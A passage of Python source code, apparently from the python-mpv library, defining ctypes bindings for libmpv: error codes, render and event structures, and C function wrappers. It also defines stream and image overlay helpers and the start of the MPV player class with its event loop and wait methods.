EVENT_QUEUE_FULL = -1
NOMEM = -2
UNINITIALIZED = -3
INVALID_PARAMETER = -4
OPTION_NOT_FOUND = -5
OPTION_FORMAT = -6
OPTION_ERROR = -7
PROPERTY_NOT_FOUND = -8
PROPERTY_FORMAT = -9
PROPERTY_UNAVAILABLE = -10
PROPERTY_ERROR = -11
COMMAND = -12
LOADING_FAILED = -13
AO_INIT_FAILED = -14
VO_INIT_FAILED = -15
NOTHING_TO_PLAY = -16
UNKNOWN_FORMAT = -17
UNSUPPORTED = -18
NOT_IMPLEMENTED = -19
GENERIC = -20
EXCEPTION_DICT = {
0: None,
-1: lambda *a: MemoryError('mpv event queue full', *a),
-2: lambda *a: MemoryError('mpv cannot allocate memory', *a),
-3: lambda *a: ValueError('Uninitialized mpv handle used', *a),
-4: lambda *a: ValueError('Invalid value for mpv parameter', *a),
-5: lambda *a: AttributeError('mpv option does not exist', *a),
-6: lambda *a: TypeError('Tried to set mpv option using wrong format', *a),
-7: lambda *a: ValueError('Invalid value for mpv option', *a),
-8: lambda *a: AttributeError('mpv property does not exist', *a),
# Currently (mpv 0.18.1) there is a bug causing a PROPERTY_FORMAT error to be returned instead of
# INVALID_PARAMETER when setting a property-mapped option to an invalid value.
-9: lambda *a: TypeError('Tried to get/set mpv property using wrong format, or passed invalid value', *a),
-10: lambda *a: PropertyUnavailableError('mpv property is not available', *a),
-11: lambda *a: RuntimeError('Generic error getting or setting mpv property', *a),
-12: lambda *a: SystemError('Error running mpv command', *a),
-14: lambda *a: RuntimeError('Initializing the audio output failed', *a),
-15: lambda *a: RuntimeError('Initializing the video output failed'),
-16: lambda *a: RuntimeError('There was no audio or video data to play. This also happens if the file '
'was recognized, but did not contain any audio or video streams, or no '
'streams were selected.'),
-17: lambda *a: RuntimeError('When trying to load the file, the file format could not be determined, '
'or the file was too broken to open it'),
-18: lambda *a: ValueError('Generic error for signaling that certain system requirements are not fulfilled'),
-19: lambda *a: NotImplementedError('The API function which was called is a stub only'),
-20: lambda *a: RuntimeError('Unspecified error') }
@staticmethod
def default_error_handler(ec, *args):
return ValueError(_mpv_error_string(ec).decode('utf-8'), ec, *args)
@classmethod
def raise_for_ec(kls, ec, func, *args):
ec = 0 if ec > 0 else ec
ex = kls.EXCEPTION_DICT.get(ec , kls.default_error_handler)
if ex:
raise ex(ec, *args)
MpvGlGetProcAddressFn = CFUNCTYPE(c_void_p, c_void_p, c_char_p)
class MpvOpenGLInitParams(Structure):
_fields_ = [('get_proc_address', MpvGlGetProcAddressFn),
('get_proc_address_ctx', c_void_p),
('extra_exts', c_void_p)]
def __init__(self, get_proc_address):
self.get_proc_address = get_proc_address
self.get_proc_address_ctx = None
self.extra_exts = None
class MpvOpenGLFBO(Structure):
_fields_ = [('fbo', c_int),
('w', c_int),
('h', c_int),
('internal_format', c_int)]
def __init__(self, w, h, fbo=0, internal_format=0):
self.w, self.h = w, h
self.fbo = fbo
self.internal_format = internal_format
class MpvRenderFrameInfo(Structure):
_fields_ = [('flags', c_int64),
('target_time', c_int64)]
def as_dict(self):
return {'flags': self.flags,
'target_time': self.target_time}
class MpvOpenGLDRMParams(Structure):
_fields_ = [('fd', c_int),
('crtc_id', c_int),
('connector_id', c_int),
('atomic_request_ptr', c_void_p),
('render_fd', c_int)]
class MpvOpenGLDRMDrawSurfaceSize(Structure):
_fields_ = [('width', c_int), ('height', c_int)]
class MpvOpenGLDRMParamsV2(Structure):
_fields_ = [('fd', c_int),
('crtc_id', c_int),
('connector_id', c_int),
('atomic_request_ptr', c_void_p),
('render_fd', c_int)]
def __init__(self, crtc_id, connector_id, atomic_request_ptr, fd=-1, render_fd=-1):
self.crtc_id, self.connector_id = crtc_id, connector_id
self.atomic_request_ptr = atomic_request_ptr
self.fd, self.render_fd = fd, render_fd
class MpvRenderParam(Structure):
_fields_ = [('type_id', c_int),
('data', c_void_p)]
# maps human-readable type name to (type_id, argtype) tuple.
# The type IDs come from libmpv/render.h
TYPES = {"invalid" :(0, None),
"api_type" :(1, str),
"opengl_init_params" :(2, MpvOpenGLInitParams),
"opengl_fbo" :(3, MpvOpenGLFBO),
"flip_y" :(4, bool),
"depth" :(5, int),
"icc_profile" :(6, bytes),
"ambient_light" :(7, int),
"x11_display" :(8, c_void_p),
"wl_display" :(9, c_void_p),
"advanced_control" :(10, bool),
"next_frame_info" :(11, MpvRenderFrameInfo),
"block_for_target_time" :(12, bool),
"skip_rendering" :(13, bool),
"drm_display" :(14, MpvOpenGLDRMParams),
"drm_draw_surface_size" :(15, MpvOpenGLDRMDrawSurfaceSize),
"drm_display_v2" :(16, MpvOpenGLDRMParamsV2)}
def __init__(self, name, value=None):
if name not in self.TYPES:
raise ValueError('unknown render param type "{}"'.format(name))
self.type_id, cons = self.TYPES[name]
if cons is None:
self.value = None
self.data = c_void_p()
elif cons is str:
self.value = value
self.data = cast(c_char_p(value.encode('utf-8')), c_void_p)
elif cons is bytes:
self.value = MpvByteArray(value)
self.data = cast(pointer(self.value), c_void_p)
elif cons is bool:
self.value = c_int(int(bool(value)))
self.data = cast(pointer(self.value), c_void_p)
elif cons is c_void_p:
self.value = value
self.data = cast(self.value, c_void_p)
else:
self.value = cons(**value)
self.data = cast(pointer(self.value), c_void_p)
def kwargs_to_render_param_array(kwargs):
t = MpvRenderParam * (len(kwargs)+1)
return t(*kwargs.items(), ('invalid', None))
class MpvFormat(c_int):
NONE = 0
STRING = 1
OSD_STRING = 2
FLAG = 3
INT64 = 4
DOUBLE = 5
NODE = 6
NODE_ARRAY = 7
NODE_MAP = 8
BYTE_ARRAY = 9
def __eq__(self, other):
return self is other or self.value == other or self.value == int(other)
def __repr__(self):
return ['NONE', 'STRING', 'OSD_STRING', 'FLAG', 'INT64', 'DOUBLE', 'NODE', 'NODE_ARRAY', 'NODE_MAP',
'BYTE_ARRAY'][self.value]
def __hash__(self):
return self.value
class MpvEventID(c_int):
NONE = 0
SHUTDOWN = 1
LOG_MESSAGE = 2
GET_PROPERTY_REPLY = 3
SET_PROPERTY_REPLY = 4
COMMAND_REPLY = 5
START_FILE = 6
END_FILE = 7
FILE_LOADED = 8
TRACKS_CHANGED = 9
TRACK_SWITCHED = 10
IDLE = 11
PAUSE = 12
UNPAUSE = 13
TICK = 14
SCRIPT_INPUT_DISPATCH = 15
CLIENT_MESSAGE = 16
VIDEO_RECONFIG = 17
AUDIO_RECONFIG = 18
METADATA_UPDATE = 19
SEEK = 20
PLAYBACK_RESTART = 21
PROPERTY_CHANGE = 22
CHAPTER_CHANGE = 23
ANY = ( SHUTDOWN, LOG_MESSAGE, GET_PROPERTY_REPLY, SET_PROPERTY_REPLY, COMMAND_REPLY, START_FILE, END_FILE,
FILE_LOADED, TRACKS_CHANGED, TRACK_SWITCHED, IDLE, PAUSE, UNPAUSE, TICK, SCRIPT_INPUT_DISPATCH,
CLIENT_MESSAGE, VIDEO_RECONFIG, AUDIO_RECONFIG, METADATA_UPDATE, SEEK, PLAYBACK_RESTART, PROPERTY_CHANGE,
CHAPTER_CHANGE )
def __repr__(self):
return ['NONE', 'SHUTDOWN', 'LOG_MESSAGE', 'GET_PROPERTY_REPLY', 'SET_PROPERTY_REPLY', 'COMMAND_REPLY',
'START_FILE', 'END_FILE', 'FILE_LOADED', 'TRACKS_CHANGED', 'TRACK_SWITCHED', 'IDLE', 'PAUSE', 'UNPAUSE',
'TICK', 'SCRIPT_INPUT_DISPATCH', 'CLIENT_MESSAGE', 'VIDEO_RECONFIG', 'AUDIO_RECONFIG',
'METADATA_UPDATE', 'SEEK', 'PLAYBACK_RESTART', 'PROPERTY_CHANGE', 'CHAPTER_CHANGE'][self.value]
@classmethod
def from_str(kls, s):
return getattr(kls, s.upper().replace('-', '_'))
identity_decoder = lambda b: b
strict_decoder = lambda b: b.decode('utf-8')
def lazy_decoder(b):
try:
return b.decode('utf-8')
except UnicodeDecodeError:
return b
class MpvNodeList(Structure):
def array_value(self, decoder=identity_decoder):
return [ self.values[i].node_value(decoder) for i in range(self.num) ]
def dict_value(self, decoder=identity_decoder):
return { self.keys[i].decode('utf-8'):
self.values[i].node_value(decoder) for i in range(self.num) }
class MpvByteArray(Structure):
_fields_ = [('data', c_void_p),
('size', c_size_t)]
def __init__(self, value):
self._value = value
self.data = cast(c_char_p(value), c_void_p)
self.size = len(value)
def bytes_value(self):
return cast(self.data, POINTER(c_char))[:self.size]
class MpvNode(Structure):
def node_value(self, decoder=identity_decoder):
return MpvNode.node_cast_value(self.val, self.format.value, decoder)
@staticmethod
def node_cast_value(v, fmt=MpvFormat.NODE, decoder=identity_decoder):
if fmt == MpvFormat.NONE:
return None
elif fmt == MpvFormat.STRING:
return decoder(v.string)
elif fmt == MpvFormat.OSD_STRING:
return v.string.decode('utf-8')
elif fmt == MpvFormat.FLAG:
return bool(v.flag)
elif fmt == MpvFormat.INT64:
return v.int64
elif fmt == MpvFormat.DOUBLE:
return v.double
else:
if not v.node: # Check for null pointer
return None
if fmt == MpvFormat.NODE:
return v.node.contents.node_value(decoder)
elif fmt == MpvFormat.NODE_ARRAY:
return v.list.contents.array_value(decoder)
elif fmt == MpvFormat.NODE_MAP:
return v.map.contents.dict_value(decoder)
elif fmt == MpvFormat.BYTE_ARRAY:
return v.byte_array.contents.bytes_value()
else:
raise TypeError('Unknown MPV node format {}. Please submit a bug report.'.format(fmt))
class MpvNodeUnion(Union):
_fields_ = [('string', c_char_p),
('flag', c_int),
('int64', c_int64),
('double', c_double),
('node', POINTER(MpvNode)),
('list', POINTER(MpvNodeList)),
('map', POINTER(MpvNodeList)),
('byte_array', POINTER(MpvByteArray))]
MpvNode._fields_ = [('val', MpvNodeUnion),
('format', MpvFormat)]
MpvNodeList._fields_ = [('num', c_int),
('values', POINTER(MpvNode)),
('keys', POINTER(c_char_p))]
class MpvSubApi(c_int):
MPV_SUB_API_OPENGL_CB = 1
class MpvEvent(Structure):
_fields_ = [('event_id', MpvEventID),
('error', c_int),
('reply_userdata', c_ulonglong),
('data', c_void_p)]
def as_dict(self, decoder=identity_decoder):
dtype = {MpvEventID.END_FILE: MpvEventEndFile,
MpvEventID.PROPERTY_CHANGE: MpvEventProperty,
MpvEventID.GET_PROPERTY_REPLY: MpvEventProperty,
MpvEventID.LOG_MESSAGE: MpvEventLogMessage,
MpvEventID.SCRIPT_INPUT_DISPATCH: MpvEventScriptInputDispatch,
MpvEventID.CLIENT_MESSAGE: MpvEventClientMessage
}.get(self.event_id.value, None)
return {'event_id': self.event_id.value,
'error': self.error,
'reply_userdata': self.reply_userdata,
'event': cast(self.data, POINTER(dtype)).contents.as_dict(decoder=decoder) if dtype else None}
class MpvEventProperty(Structure):
_fields_ = [('name', c_char_p),
('format', MpvFormat),
('data', MpvNodeUnion)]
def as_dict(self, decoder=identity_decoder):
value = MpvNode.node_cast_value(self.data, self.format.value, decoder)
return {'name': self.name.decode('utf-8'),
'format': self.format,
'data': self.data,
'value': value}
class MpvEventLogMessage(Structure):
_fields_ = [('prefix', c_char_p),
('level', c_char_p),
('text', c_char_p)]
def as_dict(self, decoder=identity_decoder):
return { 'prefix': self.prefix.decode('utf-8'),
'level': self.level.decode('utf-8'),
'text': decoder(self.text).rstrip() }
class MpvEventEndFile(Structure):
_fields_ = [('reason', c_int),
('error', c_int)]
EOF = 0
RESTARTED = 1
ABORTED = 2
QUIT = 3
ERROR = 4
REDIRECT = 5
# For backwards-compatibility
@property
def value(self):
return self.reason
def as_dict(self, decoder=identity_decoder):
return {'reason': self.reason, 'error': self.error}
class MpvEventScriptInputDispatch(Structure):
_fields_ = [('arg0', c_int),
('type', c_char_p)]
def as_dict(self, decoder=identity_decoder):
pass # TODO
class MpvEventClientMessage(Structure):
_fields_ = [('num_args', c_int),
('args', POINTER(c_char_p))]
def as_dict(self, decoder=identity_decoder):
return { 'args': [ self.args[i].decode('utf-8') for i in range(self.num_args) ] }
StreamReadFn = CFUNCTYPE(c_int64, c_void_p, POINTER(c_char), c_uint64)
StreamSeekFn = CFUNCTYPE(c_int64, c_void_p, c_int64)
StreamSizeFn = CFUNCTYPE(c_int64, c_void_p)
StreamCloseFn = CFUNCTYPE(None, c_void_p)
StreamCancelFn = CFUNCTYPE(None, c_void_p)
class StreamCallbackInfo(Structure):
_fields_ = [('cookie', c_void_p),
('read', StreamReadFn),
('seek', StreamSeekFn),
('size', StreamSizeFn),
('close', StreamCloseFn), ]
# ('cancel', StreamCancelFn)]
StreamOpenFn = CFUNCTYPE(c_int, c_void_p, c_char_p, POINTER(StreamCallbackInfo))
WakeupCallback = CFUNCTYPE(None, c_void_p)
RenderUpdateFn = CFUNCTYPE(None, c_void_p)
OpenGlCbUpdateFn = CFUNCTYPE(None, c_void_p)
OpenGlCbGetProcAddrFn = CFUNCTYPE(c_void_p, c_void_p, c_char_p)
def _handle_func(name, args, restype, errcheck, ctx=MpvHandle, deprecated=False):
func = getattr(backend, name)
func.argtypes = [ctx] + args if ctx else args
if restype is not None:
func.restype = restype
if errcheck is not None:
func.errcheck = errcheck
if deprecated:
@wraps(func)
def wrapper(*args, **kwargs):
if not wrapper.warned: # Only warn on first invocation to prevent spamming
warn("Backend C api has been deprecated: " + name, DeprecationWarning, stacklevel=2)
wrapper.warned = True
return func(*args, **kwargs)
wrapper.warned = False
globals()['_'+name] = wrapper
else:
globals()['_'+name] = func
def bytes_free_errcheck(res, func, *args):
notnull_errcheck(res, func, *args)
rv = cast(res, c_void_p).value
_mpv_free(res)
return rv
def notnull_errcheck(res, func, *args):
if res is None:
raise RuntimeError('Underspecified error in MPV when calling {} with args {!r}: NULL pointer returned.'\
'Please consult your local debugger.'.format(func.__name__, args))
return res
ec_errcheck = ErrorCode.raise_for_ec
def _handle_gl_func(name, args=[], restype=None, deprecated=False):
_handle_func(name, args, restype, errcheck=None, ctx=MpvOpenGLCbContext, deprecated=deprecated)
backend.mpv_client_api_version.restype = c_ulong
def _mpv_client_api_version():
ver = backend.mpv_client_api_version()
return ver>>16, ver&0xFFFF
backend.mpv_free.argtypes = [c_void_p]
_mpv_free = backend.mpv_free
backend.mpv_free_node_contents.argtypes = [c_void_p]
_mpv_free_node_contents = backend.mpv_free_node_contents
backend.mpv_create.restype = MpvHandle
_mpv_create = backend.mpv_create
_handle_func('mpv_create_client', [c_char_p], MpvHandle, notnull_errcheck)
_handle_func('mpv_client_name', [], c_char_p, errcheck=None)
_handle_func('mpv_initialize', [], c_int, ec_errcheck)
_handle_func('mpv_detach_destroy', [], None, errcheck=None)
_handle_func('mpv_terminate_destroy', [], None, errcheck=None)
_handle_func('mpv_load_config_file', [c_char_p], c_int, ec_errcheck)
_handle_func('mpv_get_time_us', [], c_ulonglong, errcheck=None)
_handle_func('mpv_set_option', [c_char_p, MpvFormat, c_void_p], c_int, ec_errcheck)
_handle_func('mpv_set_option_string', [c_char_p, c_char_p], c_int, ec_errcheck)
_handle_func('mpv_command', [POINTER(c_char_p)], c_int, ec_errcheck)
_handle_func('mpv_command_string', [c_char_p, c_char_p], c_int, ec_errcheck)
_handle_func('mpv_command_async', [c_ulonglong, POINTER(c_char_p)], c_int, ec_errcheck)
_handle_func('mpv_command_node', [POINTER(MpvNode), POINTER(MpvNode)], c_int, ec_errcheck)
_handle_func('mpv_command_async', [c_ulonglong, POINTER(MpvNode)], c_int, ec_errcheck)
_handle_func('mpv_set_property', [c_char_p, MpvFormat, c_void_p], c_int, ec_errcheck)
_handle_func('mpv_set_property_string', [c_char_p, c_char_p], c_int, ec_errcheck)
_handle_func('mpv_set_property_async', [c_ulonglong, c_char_p, MpvFormat,c_void_p],c_int, ec_errcheck)
_handle_func('mpv_get_property', [c_char_p, MpvFormat, c_void_p], c_int, ec_errcheck)
_handle_func('mpv_get_property_string', [c_char_p], c_void_p, bytes_free_errcheck)
_handle_func('mpv_get_property_osd_string', [c_char_p], c_void_p, bytes_free_errcheck)
_handle_func('mpv_get_property_async', [c_ulonglong, c_char_p, MpvFormat], c_int, ec_errcheck)
_handle_func('mpv_observe_property', [c_ulonglong, c_char_p, MpvFormat], c_int, ec_errcheck)
_handle_func('mpv_unobserve_property', [c_ulonglong], c_int, ec_errcheck)
_handle_func('mpv_event_name', [c_int], c_char_p, errcheck=None, ctx=None)
_handle_func('mpv_error_string', [c_int], c_char_p, errcheck=None, ctx=None)
_handle_func('mpv_request_event', [MpvEventID, c_int], c_int, ec_errcheck)
_handle_func('mpv_request_log_messages', [c_char_p], c_int, ec_errcheck)
_handle_func('mpv_wait_event', [c_double], POINTER(MpvEvent), errcheck=None)
_handle_func('mpv_wakeup', [], None, errcheck=None)
_handle_func('mpv_set_wakeup_callback', [WakeupCallback, c_void_p], None, errcheck=None)
_handle_func('mpv_get_wakeup_pipe', [], c_int, errcheck=None)
_handle_func('mpv_stream_cb_add_ro', [c_char_p, c_void_p, StreamOpenFn], c_int, ec_errcheck)
_handle_func('mpv_render_context_create', [MpvRenderCtxHandle, MpvHandle, POINTER(MpvRenderParam)], c_int, ec_errcheck, ctx=None)
_handle_func('mpv_render_context_set_parameter', [MpvRenderParam], c_int, ec_errcheck, ctx=MpvRenderCtxHandle)
_handle_func('mpv_render_context_get_info', [MpvRenderParam], c_int, ec_errcheck, ctx=MpvRenderCtxHandle)
_handle_func('mpv_render_context_set_update_callback', [RenderUpdateFn, c_void_p], None, errcheck=None, ctx=MpvRenderCtxHandle)
_handle_func('mpv_render_context_update', [], c_int64, errcheck=None, ctx=MpvRenderCtxHandle)
_handle_func('mpv_render_context_render', [POINTER(MpvRenderParam)], c_int, ec_errcheck, ctx=MpvRenderCtxHandle)
_handle_func('mpv_render_context_report_swap', [], None, errcheck=None, ctx=MpvRenderCtxHandle)
_handle_func('mpv_render_context_free', [], None, errcheck=None, ctx=MpvRenderCtxHandle)
# Deprecated in v0.29.0 and may disappear eventually
if hasattr(backend, 'mpv_get_sub_api'):
_handle_func('mpv_get_sub_api', [MpvSubApi], c_void_p, notnull_errcheck, deprecated=True)
_handle_gl_func('mpv_opengl_cb_set_update_callback', [OpenGlCbUpdateFn, c_void_p], deprecated=True)
_handle_gl_func('mpv_opengl_cb_init_gl', [c_char_p, OpenGlCbGetProcAddrFn, c_void_p], c_int, deprecated=True)
_handle_gl_func('mpv_opengl_cb_draw', [c_int, c_int, c_int], c_int, deprecated=True)
_handle_gl_func('mpv_opengl_cb_render', [c_int, c_int], c_int, deprecated=True)
_handle_gl_func('mpv_opengl_cb_report_flip', [c_ulonglong], c_int, deprecated=True)
_handle_gl_func('mpv_opengl_cb_uninit_gl', [], c_int, deprecated=True)
def _mpv_coax_proptype(value, proptype=str):
"""Intelligently coax the given python value into something that can be understood as a proptype property."""
if type(value) is bytes:
return value;
elif type(value) is bool:
return b'yes' if value else b'no'
elif proptype in (str, int, float):
return str(proptype(value)).encode('utf-8')
else:
raise TypeError('Cannot coax value of type {} into property type {}'.format(type(value), proptype))
def _make_node_str_list(l):
"""Take a list of python objects and make a MPV string node array from it.
As an example, the python list ``l = [ "foo", 23, false ]`` will result in the following MPV node object::
struct mpv_node {
.format = MPV_NODE_ARRAY,
.u.list = *(struct mpv_node_array){
.num = len(l),
.keys = NULL,
.values = struct mpv_node[len(l)] {
{ .format = MPV_NODE_STRING, .u.string = l[0] },
{ .format = MPV_NODE_STRING, .u.string = l[1] },
...
}
}
}
"""
char_ps = [ c_char_p(_mpv_coax_proptype(e, str)) for e in l ]
node_list = MpvNodeList(
num=len(l),
keys=None,
values=( MpvNode * len(l))( *[ MpvNode(
format=MpvFormat.STRING,
val=MpvNodeUnion(string=p))
for p in char_ps ]))
node = MpvNode(
format=MpvFormat.NODE_ARRAY,
val=MpvNodeUnion(list=pointer(node_list)))
return char_ps, node_list, node, cast(pointer(node), c_void_p)
def _event_generator(handle):
while True:
event = _mpv_wait_event(handle, -1).contents
if event.event_id.value == MpvEventID.NONE:
raise StopIteration()
yield event
_py_to_mpv = lambda name: name.replace('_', '-')
_mpv_to_py = lambda name: name.replace('-', '_')
_drop_nones = lambda *args: [ arg for arg in args if arg is not None ]
class _Proxy:
def __init__(self, mpv):
super().__setattr__('mpv', mpv)
class _PropertyProxy(_Proxy):
def __dir__(self):
return super().__dir__() + [ name.replace('-', '_') for name in self.mpv.property_list ]
class _FileLocalProxy(_Proxy):
def __getitem__(self, name):
return self.mpv.__getitem__(name, file_local=True)
def __setitem__(self, name, value):
return self.mpv.__setitem__(name, value, file_local=True)
def __iter__(self):
return iter(self.mpv)
class _OSDPropertyProxy(_PropertyProxy):
def __getattr__(self, name):
return self.mpv._get_property(_py_to_mpv(name), fmt=MpvFormat.OSD_STRING)
def __setattr__(self, _name, _value):
raise AttributeError('OSD properties are read-only. Please use the regular property API for writing.')
class _DecoderPropertyProxy(_PropertyProxy):
def __init__(self, mpv, decoder):
super().__init__(mpv)
super().__setattr__('_decoder', decoder)
def __getattr__(self, name):
return self.mpv._get_property(_py_to_mpv(name), decoder=self._decoder)
def __setattr__(self, name, value):
setattr(self.mpv, _py_to_mpv(name), value)
class GeneratorStream:
"""Transform a python generator into an mpv-compatible stream object. This only supports size() and read(), and
does not support seek(), close() or cancel().
"""
def __init__(self, generator_fun, size=None):
self._generator_fun = generator_fun
self.size = size
def seek(self, offset):
self._read_iter = iter(self._generator_fun())
self._read_chunk = b''
return 0 # We only support seeking to the first byte atm
# implementation in case seeking to arbitrary offsets would be necessary
# while offset > 0:
# offset -= len(self.read(offset))
# return offset
def read(self, size):
if not self._read_chunk:
try:
self._read_chunk += next(self._read_iter)
except StopIteration:
return b''
rv, self._read_chunk = self._read_chunk[:size], self._read_chunk[size:]
return rv
def close(self):
self._read_iter = iter([]) # make next read() call return EOF
def cancel(self):
self._read_iter = iter([]) # make next read() call return EOF
# TODO?
class ImageOverlay:
def __init__(self, m, overlay_id, img=None, pos=(0, 0)):
self.m = m
self.overlay_id = overlay_id
self.pos = pos
self._size = None
if img is not None:
self.update(img)
def update(self, img=None, pos=None):
from PIL import Image
if img is not None:
self.img = img
img = self.img
w, h = img.size
stride = w*4
if pos is not None:
self.pos = pos
x, y = self.pos
# Pre-multiply alpha channel
bg = Image.new('RGBA', (w, h), (0, 0, 0, 0))
out = Image.alpha_composite(bg, img)
# Copy image to ctypes buffer
if img.size != self._size:
self._buf = create_string_buffer(w*h*4)
self._size = img.size
ctypes.memmove(self._buf, out.tobytes('raw', 'BGRA'), w*h*4)
source = '&' + str(addressof(self._buf))
self.m.overlay_add(self.overlay_id, x, y, source, 0, 'bgra', w, h, stride)
def remove(self):
self.m.remove_overlay(self.overlay_id)
class FileOverlay:
def __init__(self, m, overlay_id, filename=None, size=None, stride=None, pos=(0,0)):
self.m = m
self.overlay_id = overlay_id
self.pos = pos
self.size = size
self.stride = stride
if filename is not None:
self.update(filename)
def update(self, filename=None, size=None, stride=None, pos=None):
if filename is not None:
self.filename = filename
if pos is not None:
self.pos = pos
if size is not None:
self.size = size
if stride is not None:
self.stride = stride
x, y = self.pos
w, h = self.size
stride = self.stride or 4*w
self.m.overlay_add(self, self.overlay_id, x, y, self.filename, 0, 'bgra', w, h, stride)
def remove(self):
self.m.remove_overlay(self.overlay_id)
class MPV(object):
"""See man mpv(1) for the details of the implemented commands. All mpv properties can be accessed as
``my_mpv.some_property`` and all mpv options can be accessed as ``my_mpv['some-option']``.
By default, properties are returned as decoded ``str`` and an error is thrown if the value does not contain valid
utf-8. To get a decoded ``str`` if possibly but ``bytes`` instead of an error if not, use
``my_mpv.lazy.some_property``. To always get raw ``bytes``, use ``my_mpv.raw.some_property``. To access a
property's decoded OSD value, use ``my_mpv.osd.some_property``.
To get API information on an option, use ``my_mpv.option_info('option-name')``. To get API information on a
property, use ``my_mpv.properties['property-name']``. Take care to use mpv's dashed-names instead of the
underscore_names exposed on the python object.
To make your program not barf hard the first time its used on a weird file system **always** access properties
containing file names or file tags through ``MPV.raw``. """
def __init__(self, *extra_mpv_flags, log_handler=None, start_event_thread=True, loglevel=None, **extra_mpv_opts):
"""Create an MPV instance.
Extra arguments and extra keyword arguments will be passed to mpv as options.
"""
self.handle = _mpv_create()
self._event_thread = None
self._core_shutdown = False
_mpv_set_option_string(self.handle, b'audio-display', b'no')
istr = lambda o: ('yes' if o else 'no') if type(o) is bool else str(o)
try:
for flag in extra_mpv_flags:
_mpv_set_option_string(self.handle, flag.encode('utf-8'), b'')
for k,v in extra_mpv_opts.items():
_mpv_set_option_string(self.handle, k.replace('_', '-').encode('utf-8'), istr(v).encode('utf-8'))
finally:
_mpv_initialize(self.handle)
self.osd = _OSDPropertyProxy(self)
self.file_local = _FileLocalProxy(self)
self.raw = _DecoderPropertyProxy(self, identity_decoder)
self.strict = _DecoderPropertyProxy(self, strict_decoder)
self.lazy = _DecoderPropertyProxy(self, lazy_decoder)
self._event_callbacks = []
self._event_handler_lock = threading.Lock()
self._property_handlers = collections.defaultdict(lambda: [])
self._quit_handlers = set()
self._message_handlers = {}
self._key_binding_handlers = {}
self._event_handle = _mpv_create_client(self.handle, b'py_event_handler')
self._log_handler = log_handler
self._stream_protocol_cbs = {}
self._stream_protocol_frontends = collections.defaultdict(lambda: {})
self.register_stream_protocol('python', self._python_stream_open)
self._python_streams = {}
self._python_stream_catchall = None
self.overlay_ids = set()
self.overlays = {}
if loglevel is not None or log_handler is not None:
self.set_loglevel(loglevel or 'terminal-default')
if start_event_thread:
self._event_thread = threading.Thread(target=self._loop, name='MPVEventHandlerThread')
self._event_thread.setDaemon(True)
self._event_thread.start()
else:
self._event_thread = None
def _loop(self):
for event in _event_generator(self._event_handle):
try:
devent = event.as_dict(decoder=lazy_decoder) # copy data from ctypes
eid = devent['event_id']
with self._event_handler_lock:
if eid == MpvEventID.SHUTDOWN:
self._core_shutdown = True
for callback in self._event_callbacks:
callback(devent)
if eid == MpvEventID.PROPERTY_CHANGE:
pc = devent['event']
name, value, _fmt = pc['name'], pc['value'], pc['format']
for handler in self._property_handlers[name]:
handler(name, value)
if eid == MpvEventID.LOG_MESSAGE and self._log_handler is not None:
ev = devent['event']
self._log_handler(ev['level'], ev['prefix'], ev['text'])
if eid == MpvEventID.CLIENT_MESSAGE:
# {'event': {'args': ['key-binding', 'foo', 'u-', 'g']}, 'reply_userdata': 0, 'error': 0, 'event_id': 16}
target, *args = devent['event']['args']
if target in self._message_handlers:
self._message_handlers[target](*args)
if eid == MpvEventID.SHUTDOWN:
_mpv_detach_destroy(self._event_handle)
return
except Exception as e:
print('Exception inside python-mpv event loop:', file=sys.stderr)
traceback.print_exc()
@property
def core_shutdown(self):
"""Property indicating whether the core has been shut down. Possible causes for this are e.g. the `quit` command
or a user closing the mpv window."""
return self._core_shutdown
def check_core_alive(self):
""" This method can be used as a sanity check to tests whether the core is still alive at the time it is
called."""
if self._core_shutdown:
raise ShutdownError('libmpv core has been shutdown')
def wait_until_paused(self):
"""Waits until playback of the current title is paused or done. Raises a ShutdownError if the core is shutdown while
waiting."""
self.wait_for_property('core-idle')
def wait_for_playback(self):
"""Waits until playback of the current title is finished. Raises a ShutdownError if the core is shutdown while
waiting.
"""
self.wait_for_event('end_file')
def wait_until_playing(self):
"""Waits until playback of the current title has started. Raises a ShutdownError if the core is shutdown while
waiting."""
self.wait_for_property('core-idle', lambda idle: not idle)
def wait_for_property(self, name, cond=lambda val: val, level_sensitive=True):
"""Waits until ``cond`` evaluates to a truthy value on the named property. This can be used to wait for
properties such as ``idle_active`` indicating the player is done with regular playback and just idling around.
Raises a ShutdownError when the core is shutdown while waiting.
"""
with self.prepare_and_wait_for_property(name, cond, level_sensitive):
pass
def wait_for_shutdown(self):
'''Wait for core to shutdown (e.g. through quit() or terminate()).'''
sema = threading.Semaphore(value=0)
@self.event_callback('shutdown')
def shutdown_handler(event):
sema.release()
sema.acquire()
shutdown_handler.unregister_mpv_events()
@contextmanager
def prepare_and_wait_for_property(self, name, cond=lambda val: val, level_sensitive=True):
"""Context manager that waits until ``cond`` evaluates to a truthy value on the named property. See
prepare_and_wait_for_event for usage.
Raises a ShutdownError when the core is shutdown while waiting.
"""
sema = threading.Semaphore(value=0)
def observer(name, val):
if cond(val):
sema.release()
self.observe_property(name, observer)
@self.event_callback('shutdown')
def shutdown_handler(event):
sema.release()
yield
if not level_sensitive or not cond(getattr(self, name.replace('-', '_'))):
sema.acquire()
self.check_core_alive()
shutdown_handler.unregister_mpv_events()
self.unobserve_property(name, observer)
def wait_for_event(self, *event_types, cond=lambda evt: True):
"""Waits for the indicated event(s). If cond is given, waits until cond(event) is true. Raises a ShutdownError
if the core is shutdown while waiting. This also happens when 'shutdown' is in event_types.
"""
with self.prepare_and_wait_for_event(*event_types, cond=cond):
pass
@contextmanager
def prepare_and_wait_for_event(self, *event_types, cond=lambda evt: True):
"""Context manager that waits for the indicated event(s) like wait_for_event after running. If cond is given,
waits until cond(event) is true. Raises a ShutdownError if the core is shutdown while waiting. This also happens
when 'shutdown' is in event_types.
Compared to wait_for_event this handles the case where a thread waits for an event it itself causes in a
thread-safe way. An example from the testsuite is:
with self.m.prepare_and_wait_for_event('client_message'):
self.m.keypress(key)
Using just wait_for_event it would be impossible to ensure the event is caught since it may already have been
handled in the interval between keypress(...) running and a subsequent wait_for_event(...) call.
"""
sema = threading.Semaphore(value=0)
@self.event_callback('shutdown')
def shutdown_handler(event):
sema.release()
@self.event_callback(*event_types)
def target_handler(evt):
if cond(evt):
sema.release()
yield
sema.acquire()
self.check_core_alive()
shutdown_handler.unregister_mpv_events()
target_handler.unregister_mpv_events()
def __del__(self):
if self.handle:
self.terminate()
def terminate(self):
"""Properly terminates this player instance. Preferably use this instead of relying on python's garbage
collector to cause this to be called from the object's destructor.
This method will detach the main libmpv handle and wait for mpv to shut down and the event thread to finish.
"""
self.handle, handle = None, self.handle
if threading.current_thread() is self._event_thread:
